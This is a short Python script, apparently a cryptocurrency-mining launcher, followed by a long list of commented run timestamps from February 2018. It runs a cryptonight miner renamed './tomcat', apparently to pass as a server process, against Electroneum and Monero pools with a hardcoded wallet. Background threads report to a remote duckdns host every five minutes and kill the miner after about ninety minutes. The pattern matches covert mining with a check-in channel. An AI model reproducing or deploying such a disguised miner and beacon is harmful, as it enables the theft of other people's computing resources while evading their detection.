import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:07.329647
#2018-02-17 16:34:08.413924
#2018-02-17 18:23:05.059015
#2018-02-17 20:11:04.792423
#2018-02-17 21:59:02.183578
#2018-02-17 23:44:04.712094
#2018-02-18 01:34:03.958467
#2018-02-18 03:21:01.866106
#2018-02-18 05:08:07.632118
#2018-02-18 07:00:06.932422
#2018-02-18 08:49:03.555421
#2018-02-18 10:36:06.496522
#2018-02-18 12:21:04.466909
#2018-02-18 14:08:07.488789
#2018-02-18 15:58:06.894518
#2018-02-18 17:48:01.304412
#2018-02-18 19:36:04.790668
#2018-02-18 21:21:06.618564
#2018-02-18 23:09:01.331517
#2018-02-19 00:56:06.958872
#2018-02-19 02:43:04.367996
#2018-02-19 04:29:06.839803
#2018-02-19 06:14:06.043606
#2018-02-19 08:02:01.470452
#2018-02-19 09:52:06.053130
#2018-02-19 11:41:08.315200
#2018-02-19 13:27:04.606963
#2018-02-19 15:14:08.643081
#2018-02-19 17:03:09.895235
#2018-02-19 18:49:01.887682
#2018-02-19 20:40:02.059203
#2018-02-19 22:27:07.424344
#2018-02-20 00:13:01.501607
#2018-02-20 01:59:06.638481
#2018-02-20 03:49:06.350383
#2018-02-20 05:34:03.483072
#2018-02-20 07:18:01.769908
#2018-02-20 09:04:01.379618
#2018-02-20 10:46:01.210561
#2018-02-20 12:32:01.591685
#2018-02-20 14:18:01.327069
#2018-02-20 16:01:01.266210
#2018-02-20 17:47:04.376822
#2018-02-20 19:38:06.111616
#2018-02-20 21:23:03.860529
#2018-02-20 23:07:05.721881
#2018-02-21 00:50:08.898980
#2018-02-21 02:35:08.986230
#2018-02-21 04:24:01.820562
#2018-02-21 06:11:08.175941
#2018-02-21 07:57:01.308794
#2018-02-21 09:42:01.450445
#2018-02-21 11:31:07.216823
#2018-02-21 13:19:07.211867
#2018-02-21 15:04:07.967924
#2018-02-21 16:54:09.341535
#2018-02-21 18:41:10.216750
#2018-02-21 20:27:04.131466
#2018-02-21 22:14:05.708704
#2018-02-22 00:04:02.200147
#2018-02-22 01:52:02.088338
#2018-02-22 03:39:01.292669
#2018-02-22 05:25:08.112628
#2018-02-22 07:10:01.318639
#2018-02-22 08:58:03.479360
#2018-02-22 10:46:07.408683
#2018-02-22 12:34:04.110832
#2018-02-22 14:19:05.553962
#2018-02-22 16:06:08.720876
#2018-02-22 17:52:05.618204
#2018-02-22 19:41:04.553809
#2018-02-22 21:31:06.409175
#2018-02-22 23:18:05.817502
#2018-02-23 01:04:05.353451
#2018-02-23 02:52:06.619316
#2018-02-23 04:40:07.278494
#2018-02-23 06:27:06.269444
#2018-02-23 08:15:10.281995
#2018-02-23 10:32:01.870041
#2018-02-23 12:26:08.788302
#2018-02-23 14:15:08.443357
#2018-02-23 16:06:10.447902
#2018-02-23 17:53:06.565346
#2018-02-23 19:38:01.856099
#2018-02-23 21:20:09.119438
#2018-02-23 23:09:01.601052
#2018-02-24 00:55:07.172894
#2018-02-24 02:50:06.421090
#2018-02-24 04:40:01.839876
#2018-02-24 06:24:07.613560
#2018-02-24 08:12:07.127650
#2018-02-24 09:58:05.819511
#2018-02-24 11:54:06.723079
#2018-02-24 13:44:04.156151
#2018-02-24 15:35:04.293079
#2018-02-24 17:28:07.375306
#2018-02-24 19:15:08.317127
#2018-02-24 21:02:03.845232
#2018-02-24 23:35:04.719518
#2018-02-25 03:35:08.059419
#2018-02-25 07:12:05.127294